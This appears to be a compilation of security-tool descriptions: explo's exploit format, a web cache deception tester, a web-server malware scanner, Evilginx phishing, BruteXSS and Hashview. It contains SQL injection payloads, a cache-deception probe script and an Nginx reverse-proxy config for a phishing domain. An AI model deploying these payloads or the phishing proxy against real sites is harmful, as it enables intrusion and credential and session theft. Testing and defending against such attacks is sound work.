explo - Human And Machine Readable Web Vulnerability Testing Format

explo is a simple tool to describe web security issues in a human and machine readable format. By defining a request/condition workflow, explo is able to exploit security issues without the need to write a script. This makes it possible to share complex vulnerabilities in a simple, readable and executable format.

Example of extracting a CSRF token and using it in a form:
name: get_csrf
description: extract csrf token
module: http
parameter:
    url: http://example.com/contact
    method: GET
    header:
        user-agent: Mozilla/5.0
    extract:
        csrf: [CSS, "#csrf"]
---
name: exploit
description: exploits sql injection vulnerability with valid csrf token
module: http
parameter:
    url: http://example.com/contact
    method: POST
    body:
        csrf: "{{get_csrf.extracted.csrf}}"
        username: "' SQL INJECTION"
    find: You have an error in your SQL syntax


In this example definition file the security issue is tested by executing two steps, which are run from top to bottom. The last step returns success or failure, depending on whether the string 'You have an error in your SQL syntax' is found in the response.

Installation

Install via PyPI
pip install explo

Install via source
git clone https://github.com/dtag-dev-sec/explo
cd explo
python setup.py install

Usage
explo [--verbose|-v] testcase.yaml
explo [--verbose|-v] examples/*.yaml
There are a few example testcases in the examples/ folder.
$ explo examples/SQLI_simple_testphp.vulnweb.com.yaml
You can also include explo as a python lib:
from explo.core import from_content as explo_from_content
from explo.core import ExploException, ProxyException

def save_log(msg):
    print(msg)

try:
    result = explo_from_content(explo_yaml_file, save_log)
except ExploException as err:
    print(err)

Modules
Modules can be added to improve functionality and classes of security issues.

http (basic)
The http module allows making an HTTP request, extracting content and searching/verifying content.
The following data is made available for subsequent steps:
  • the http response body: stepname.response.content
  • the http response cookies: stepname.response.cookies
  • extracted content: stepname.extracted.variable_name
If a find_regex parameter is set, a regular expression match is executed on the response body. If this fails, the module returns a failure, which stops the execution of the current workflow (and all remaining steps).
When extracting by regular expressions, use the named match group 'extract' to mark the value to extract (see the example below).
To reference cookies, use the name of the previous step the cookies should be taken from (cookies: the_other_step.response.cookies).
Parameter examples:
parameter:
    url: http://example.com
    method: GET
    allow_redirects: True
    headers:
        User-Agent: explo
        Content-Type: abc
    cookies: stepname.response.cookies
    body:
        key: value
    find: search for string
    find_regex: search for (reg|ular)expression
    find_in_headers: searchstring in headers
    extract:
        variable1: [CSS, '#csrf']
        variable2: [REGEX, '<input(.*?)value="(?P<extract>.*?)"']

http_header
The http_header module allows checking whether a response is missing a specified set of headers (and values). All other parameters are identical to the http module.
The following data is made available for other modules:
  • the http response body: stepname.response.content
  • the http response cookies: stepname.response.cookies
Parameter examples:
parameter:
    url: http://example.com
    method: GET
    allow_redirects: True
    headers:
        User-Agent: explo
        Content-Type: abc
    body:
        key: value
    headers_required:
        X-XSS-Protection: 1
        Server: . # all values are valid

sqli_blind
The sqli_blind module is able to identify time-based blind SQL injections.
The following data is made available for other modules:
  • the http response body: stepname.response.content
  • the http response cookies: stepname.response.cookies
Parameter examples:
parameter:
    url: http://example.com/vulnerable.php?id=1' waitfor delay '00:00:5'--
    method: GET
    delay_seconds: 5
If the response takes longer than the threshold of 5 seconds (delay_seconds), the check returns true (and thus results in a success).
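The example above uses Microsoft SQL Server's waitfor delay syntax. As a purely hypothetical variation, a MySQL backend could be tested the same way by injecting SLEEP() instead; only the payload in the URL changes:
parameter:
    url: http://example.com/vulnerable.php?id=1' AND SLEEP(5)-- -
    method: GET
    delay_seconds: 5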


Airachnid Burp Extension - A Burp Extension to test applications for vulnerability to the Web Cache Deception attack


A Burp extension to test applications for vulnerability to the Web Cache Deception attack.
Once the extension has been loaded, it can be accessed from the Target - Sitemap tab by right-clicking on the resource that should be tested. A context-sensitive menu item called "Airachnid Web Cache Test" will be shown and can be used to conduct the test. If the resource is vulnerable, an Issue is created detailing the vulnerability.
The context-sensitive menu item is also available for requests in the Proxy - Http History tab.

Installation
  • Download the Airachnid.jar file.
  • In Burp Suite open Extender tab. In Extensions tab, click Add button.
  • Choose downloaded jar file -> Next.
  • Check installation for no error messages.

Vulnerability
In February 2017, security researcher Omer Gil unveiled a new attack vector dubbed “Web Cache Deception” (https://omergil.blogspot.co.il/2017/02/web-cache-deception-attack.html).
The Web Cache Deception attack can have devastating consequences, but is very simple to execute:
  1. Attacker coerces victim to open a link on the valid application server containing the payload.
  2. Attacker opens newly cached page on the server using the same link, to see the exact same page as the victim.
Of course, this attack only makes sense when the vulnerable resource available to the attacker returns sensitive data.
The attack depends on a very specific set of circumstances to make the application vulnerable:
1. The application only reads the first part of the URL to determine the resource to return.
If the victim requests:
https://www.example.com/my_profile
The application returns the victim profile page. The application uses only the first part of the URL to determine that the profile page should be returned. If the application receives a request for
https://www.example.com/my_profile_test
it would still return the profile page of the victim, disregarding the added text. The same applies to other URLs like
https://www.example.com/my_profile/test
2. The application stack caches resources according to their file extensions, rather than by cache header values. If the application stack has been configured to cache image files, it will cache all resources with .jpg, .png or .gif extensions. That means that, e.g., the image at
https://www.example.com/images/dog.jpg
would be retrieved from the application server the first time the image is requested. All subsequent requests for the image are served from the cache, responding with the same resource that was initially cached (for as long as the cache timeout allows).

Attack
These preconditions can be exploited for the Web Cache Deception attack in the following manner:

Step 1: An attacker entices the victim to open a maliciously crafted link:
  https://www.example.com/my_profile/test.jpg
  • The application ignores the 'test.jpg' part of the URL; the victim's profile page is loaded.
  • The caching mechanism identifies the resource as an image, caching it.  

Step 2: The attacker sends a GET request for the cached page:
https://www.example.com/my_profile/test.jpg
  • The cached resource, which is in fact the victim's profile page, is returned to the attacker (and to anyone else requesting it).
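The Airachnid extension automates this test from within Burp. To illustrate the underlying check outside of Burp, here is a minimal, hypothetical Python sketch (not the extension's code) that probes a single authenticated URL for the two preconditions described above; the base URL, path and session cookie are placeholders:

import requests

BASE = "https://www.example.com"          # placeholder target
PROFILE = "/my_profile"                   # placeholder authenticated resource
COOKIES = {"session": "victim-session"}   # placeholder session cookie

def probe_web_cache_deception(base, path, cookies):
    # Precondition 1: the application ignores an appended /<something>.jpg suffix
    original = requests.get(base + path, cookies=cookies)
    padded = requests.get(base + path + "/wcd_test.jpg", cookies=cookies)
    if original.text != padded.text:
        return False  # extra path segment changes the response, not exploitable

    # Precondition 2: the padded URL is now served from cache to an anonymous client
    anonymous = requests.get(base + path + "/wcd_test.jpg")  # no session cookie
    return anonymous.text == padded.text

if __name__ == "__main__":
    print(probe_web_cache_deception(BASE, PROFILE, COOKIES))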

Web Exploit Detector - Tool To Detect Possible Infections, Malicious Code And Suspicious Files In Web Hosting Environments


The Web Exploit Detector is a Node.js application (and NPM module) used to detect possible infections, malicious code and suspicious files in web hosting environments. This application is intended to be run on web servers hosting one or more websites. Running the application will generate a list of files that are potentially infected together with a description of the infection and references to online resources relating to it.

As of version 1.1.0 the application also includes utilities to generate and compare snapshots of a directory structure, allowing users to see if any files have been modified, added or removed.
The application is hosted here on GitHub so that others can benefit from it, as well as allowing others to contribute their own detection rules.

Installation

Regular users
The simplest way to install Web Exploit Detector is as a global NPM module: -
npm install -g web_exploit_detector
If you are running Linux or another Unix-based OS you might need to run this command as root (e.g. sudo npm install -g web_exploit_detector).

Updating
The module should be updated regularly to make sure that all of the latest detection rules are present. Running the above command will always download the latest stable (tested) version. To update a version that has already been installed, simply run the following: -
npm update -g web_exploit_detector
Again, you may have to use the sudo command as above.

Technical users
You can also clone the Git repository and run the script directly like so: -
  1. git clone https://github.com/polaris64/web_exploit_detector
  2. cd web_exploit_detector
  3. npm install

Running

From NPM module
If you have installed Web Exploit Detector as an NPM module (see above) then running the scanner is as simple as running the following command, passing in the path to your webroot (location of your website files): -
wed-scanner --webroot=/var/www/html
Other command-line options are available, simply run wed-scanner --help to see a help message describing them.
Running the script in this way will produce human-readable output to the console. This is very useful when running the script with cron for example as the output can be sent as an e-mail whenever the script runs.
The script also supports the writing of results to a more computer-friendly JSON format for later processing. To enable this output, see the --output command line argument.

From cloned Git repository
Simply call the script via node and pass the path to your webroot as follows: -
node index.js --webroot=/var/www/html

Recursive directory snapshots
The Web Exploit Detector also comes with two utilities to help to identify files that might have changed unexpectedly. A successful attack on a site usually involves deleting files, adding new files or changing existing files in some way.

Snapshots
A snapshot (as used by these utilities) is a JSON file which lists all files as well as a description of their contents at the point in which the snapshot was created. If a snapshot was generated on Monday, for example, and then the site was attacked on Tuesday, then running a comparison between this snapshot and the current site files afterwards will show that one or more files were added, deleted or changed. The goal of these utilities therefore is to allow these snapshots to be created and for the comparisons to be performed when required.
The snapshot stores each file path together with a SHA-256 hash of the file contents. A hash, or digest, is a small summary of a message, which in this case is the file's contents. If the file contents change, even in a very small way, the hash will become completely different. This provides a good way of detecting any changes to file contents.
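To illustrate the concept (this is not the tool's own Node.js implementation), a minimal Python sketch that builds such a snapshot and compares two of them might look like this; the webroot and output paths are placeholders:

import hashlib
import json
import os

def build_snapshot(webroot):
    # Map every file path under webroot to a SHA-256 hash of its contents
    snapshot = {}
    for dirpath, _dirs, files in os.walk(webroot):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                snapshot[path] = hashlib.sha256(fh.read()).hexdigest()
    return snapshot

def compare_snapshots(old, new):
    # Report files that were added, removed or changed between two snapshots
    return {
        "added": sorted(set(new) - set(old)),
        "removed": sorted(set(old) - set(new)),
        "changed": sorted(p for p in old if p in new and old[p] != new[p]),
    }

if __name__ == "__main__":
    snap = build_snapshot("/var/www/html")      # placeholder webroot
    with open("snapshot.json", "w") as fh:      # placeholder output file
        json.dump(snap, fh, indent=2)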

Usage
The following two utilities are also installed as part of Web Exploit Detector: -
  • wed-generate-snapshot: this utility allows a snapshot to be generated for all files (recursively) in a directory specified by "--webroot". The snapshot will be saved to a file specified in the "--output" option.
  • wed-compare-snapshot: once a snapshot has been generated it can be compared against the current contents of the same directory. The snapshot to check is specified using the "--snapshot" option. The base directory to check against is stored within the snapshot, but if the base directory has changed since the snapshot was generated then the --webroot option can be used.
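For example, assuming default options, a typical workflow using only the flags described above might be (paths are placeholders): -
wed-generate-snapshot --webroot=/var/www/html --output=snapshot.json
wed-compare-snapshot --snapshot=snapshot.json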

Workflow
Snapshots can be generated as frequently as required, but as a general rule of thumb they should be generated whenever a site is in a clean (non-infected) state and whenever a legitimate change has been made. For CMS-based sites like WordPress, snapshots should be created regularly, as new uploads will cause the current state to diverge from the stored snapshot. For sites whose files should never change, a single snapshot can be generated and then used indefinitely to ensure nothing actually does change.

Usage as a module
The src/web-exploit-detector.js script is an ES6 module that exports the set of rules (as rules) as well as a number of functions: -
  • executeTests(settings): runs the exploit checker based on the passed settings object. For usage, please consult the index.js script.
  • formatResult(result): takes a single test result from the array returned from executeTests() and generates a string of results ready for output for that test.
  • getFileList(path): returns an array of files from the base path using readDirRecursive().
  • processRulesOnFile(file, rules): processes all rules from the array rules on a single file (string path).
  • readDirRecursive(path): recursive function which returns a Promise which will be resolved with an array of all files in path and sub-directories.
The src/cli.js script is a simple command-line interface (CLI) to this module as used by the wed-scanner script, so reading this script shows one way in which this module can be used.
The project uses Babel to compile the ES6 modules in "src" to plain JavaScript modules in "lib". If you are running an older version of Node.js then modules can be require()'d from the "lib" directory instead.

Building
The package contains Babel as a dev-dependency and the "build" and "watch:build" scripts. When running the "build" script (npm run build), the ES6 modules in "./src" will be compiled and saved to "./lib", where they are included by the CLI scripts.
The "./lib" directory is included in the repository so that any user can clone the repository and run the application directly without having to install dev-dependencies and build the application.

Excluding results per rule
Sometimes rules, especially those tagged with suspicion, will identify a clean file as a potential exploit. Because of this, a system to allow files to be excluded from being checked for a rule is also included.
The wed-results-to-exceptions script takes an output file from the main detector script (see the --output option) and gives you the choice to exclude each file in turn for each specific rule. All excluded files are stored in a file called wed-exceptions.json (in the user's home directory) which is read by the main script before running the scan. If a file is listed in this file then all attached rules (by ID) will be skipped when checking this file.
For usage instructions, simply run wed-results-to-exceptions. You will need to have a valid output JSON from a previous run of the main detector first using the --output option.
For users working directly with the Git repository, run node results_to_exceptions.js in the project root directory.

Rule engine
The application operates using a collection of "rules" which are loaded when the application is run. Each rule consists of an ID, name, description, list of URLs, tags, deprecation flag and most importantly a set of tests.
Each individual test must be one of the following: -
  • A regular expression: the simplest type of test, any value matching the regex will pass the test.
  • A Boolean callback: the callback function must return a Boolean value indicating if the value passes the test. The callback is free to perform any synchronous operations.
  • A Promise callback: the callback function must return a Promise which is resolved with a Boolean value indicating if the value passes the test. This type of callback is free to perform any asynchronous operations.
The following test types are supported: -
  • "path": used to check the file path. This test must exist and should evaluate to true if the file path is considered to match the rule.
  • "content": used to check the contents of a file. This test is optional and file contents will only be read and sent to rules that implement this test type. When this test is a function, the content (string) will be passed as the first argument and the file path will be passed as the second argument, allowing the test to perform additional file operations.

Expanding on the rules
As web-based exploits are constantly evolving and new exploits are being created, the set of rules needs to be updated too. As I host a number of websites, I am constantly observing new kinds of exploits, so I will be adding to the set of rules whenever I can. I run this tool on my own servers, so of course I want it to be as functional as possible!
This brings me to the reasons why I have made this application available as an open-source project: firstly so that you and others can benefit from it, and secondly so that we can all collaborate to contribute detection rules so that the application is always up to date.

Contributing rules
If you have discovered an exploit that is not detected by this tool then please either contact me to let me know or even better, write your own rule and add it to the third-party rule-set (rules/third-party/index.js), then send me a pull request.
Don't worry if you don't know how to write your own rules; the most important thing is that the rule gets added, so feel free to send me as much information as you can about the exploit and I will try to create my own rule for it.
Rules are categorised, but the simplest way to add your own rule is to add it to the third-party rule-set mentioned above. Rule IDs are written in the following format: "author:type:sub-type(s):rule-id". For example, one of my own rules is "P64:php:cms:wordpress:wso_webshell". "P64" is me (the author), "php:cms:wordpress" is the grouping (a PHP-specific rule, for the Content Management System (CMS) called WordPress) and "wso_webshell" is the specific rule ID. When writing your own rules, try to follow this format, and replace "P64" with your own GitHub username or other unique ID.

Unit tests and linting
The project contains a set of Jasmine tests which can be run using npm test. It also contains an ESLint configuration, and ESLint can be run using npm run lint.
When developing, tests can also be run whenever a source file changes by running npm run watch:test. To run tests and ESLint, the npm run watch:all script can be used.
Please note that unless you already have Jasmine and/or nodemon installed, you should run npm install in non-production mode to ensure that the dev-dependencies are installed.


Evilginx - MITM Attack Framework [Advanced Phishing With Two-factor Authentication Bypass]


Evilginx is a man-in-the-middle attack framework used for phishing credentials and session cookies of any web service. Its core runs on the Nginx HTTP server, which utilizes proxy_pass and sub_filter to proxy and modify HTTP content while intercepting traffic between client and server.
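As a rough illustration of that mechanism (this is not Evilginx's actual configuration), an Nginx server block that uses proxy_pass and sub_filter to relay traffic to a target site and rewrite its hostname in responses could look like this; the domains and certificate paths are placeholders:

server {
    listen 443 ssl;
    server_name phishing.example.net;                        # placeholder proxy domain
    ssl_certificate     /etc/ssl/phishing.example.net.crt;   # placeholder certificate
    ssl_certificate_key /etc/ssl/phishing.example.net.key;   # placeholder key

    location / {
        # Relay every request to the legitimate service
        proxy_pass https://accounts.example.com;
        # Ask upstream for uncompressed responses so sub_filter can rewrite them
        proxy_set_header Accept-Encoding "";

        # Rewrite the real hostname in response bodies so links keep pointing at the proxy
        sub_filter 'accounts.example.com' 'phishing.example.net';
        sub_filter_once off;
    }
}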

You can learn how it works and how to install everything yourself on:

Usage
usage: evilginx_parser.py [-h] -i INPUT -o OUTDIR -c CREDS [-x]

optional arguments:
  -h, --help            show this help message and exit
  -i INPUT, --input INPUT
                        Input log file to parse.
  -o OUTDIR, --outdir OUTDIR
                        Directory where output files will be saved.
  -c CREDS, --creds CREDS
                        Credentials configuration file.
  -x, --truncate        Truncate log file after parsing.
Example:
python evilginx_parser.py -i /var/log/evilginx-google.log -o ./logs -c google.creds

Video

morty - Privacy aware web content sanitizer proxy as a service


Web content sanitizer proxy as a service.

Morty rewrites web pages to exclude malicious HTML tags and attributes. It also replaces external resource references to prevent third party information leaks.
The main goal of morty is to provide a result proxy for searx, but it can be used as a standalone sanitizer service too.

Features:
  • HTML sanitization
  • Rewrites HTML/CSS external references to locals
  • JavaScript blocking
  • No Cookies forwarded
  • No Referrers
  • No Caching/Etag
  • Supports GET/POST forms and IFrames
  • Optional HMAC URL verifier key to prevent service abuse

Installation and setup
$ go get github.com/asciimoo/morty
$ "$GOPATH/bin/morty" --help

Test
$ cd "$GOPATH/src/github.com/asciimoo/morty"
$ go test

Benchmark
$ cd "$GOPATH/src/github.com/asciimoo/morty"
$ go test -benchmem -bench .


BruteXSS - Tool to find XSS vulnerabilities in web application


BruteXSS is a tool written in Python simply to find XSS vulnerabilities in web applications.
This tool was originally developed by Shawar Khan as a CLI tool. I just redesigned it and gave it a GUI for more convenience.

This tool is developed in Python, so it is cross-platform; you just need Python installed on your machine.

Steps

  1. Just download the tool & run brutexss.py (everything this tool needs is provided with it)
Screenshots





Hashview - A Web Front-End For Password Cracking And Analytics


Hashview is a tool for security professionals to help organize and automate the repetitious tasks related to password cracking. Hashview is a web application that manages hashcat (https://hashcat.net) commands. Hashview strives to bring consistency to your hashcat tasks while delivering analytics with pretty pictures ready for ctrl+c, ctrl+v into your reports.

Requirements
  1. Hashcat installed and working ( https://hashcat.net/hashcat/ )
  2. Hashcat installed and working (just double checking)
  3. A working RVM environment ( https://rvm.io/rvm/install )

Installation
Involves installing mysql, resque, and a ruby app

Install mysql & Redis

sudo apt-get update
sudo apt-get install mysql-server libmysqlclient-dev redis-server openssl rake
[optional, but recommended]
mysql_secure_installation

Optimize the database

vim /etc/mysql/my.cnf
Add the following line under the [mysqld] section:
innodb_flush_log_at_trx_commit  = 0
restart mysqld
service mysql restart

Install RVM (recommended)

https://rvm.io/rvm/install

Setup Hashview

Download Hashview

git clone https://github.com/hashview/hashview

Install gems (from hashview directory)

Install ruby 2.2.2 via RVM (if using RVM (recommended))
rvm install ruby-2.2.2
Install dependencies
gem install bundler
bundle install

Setup database connectivity

cp config/database.yml.example config/database.yml
vim config/database.yml

Create database

RACK_ENV=production rake db:setup

DerbyCon 2016 Talk on Hashview




Developing and Contributing
Please see the Contribution Guide for how to develop and contribute.
If you have any problems, please consult Issues page first. If you don't see a related issue, feel free to add one and we'll help.

Authors
Contact us on Twitter @caseycammilleri
@jarsnah12
Checkout www.shellntel.com


[ImageCacheViewer] View images in the cache of your Web browser


ImageCacheViewer is a simple tool that scans the cache of your Web browser (Internet Explorer, Firefox, or Chrome), and lists the images displayed in the Web sites that you recently visited. 

For every cached image file, the following information is displayed: URL of the image, Web browser that was used to visit the page, image type, date/time of the image, browsing time, and file size. 

When selecting a cache item in the upper pane of ImageCacheViewer, the image is displayed in the lower pane, and you can copy the image to the clipboard by pressing Ctrl+M.

System Requirements And Limitations
  • This utility works in any version of Windows, starting from Windows XP and up to Windows 8. Both 32-bit and 64-bit systems are supported.
  • The following Web browsers are supported: Internet Explorer, Mozilla Firefox, SeaMonkey, and Google Chrome.
  • ImageCacheViewer won't work if you configure your Web browser to clear the cache after closing it.
  • It's recommended to close all windows of your Web browser before using ImageCacheViewer, to ensure that all cache files are saved to the disk.

Start Using ImageCacheViewer

ImageCacheViewer doesn't require any installation process or additional DLL files. In order to start using it, simply run the executable file - ImageCacheViewer.exe
After running ImageCacheViewer, it begins to scan the cache of your Web browser, and displays all cached images from Web sites you visited in the last day. If you want to get images from other days, you can remove or change the last 1-day filter from the 'Advanced Options' window (F9).
After the scanning process is finished, you can also watch the image in the lower pane of ImageCacheViewer, by selecting the desired item in the upper pane.
If for some reason ImageCacheViewer fails to detect the cache of your Web browser properly, you can go to the 'Advanced Options' window (F9) and choose the desired cache folders to scan for each Web browser.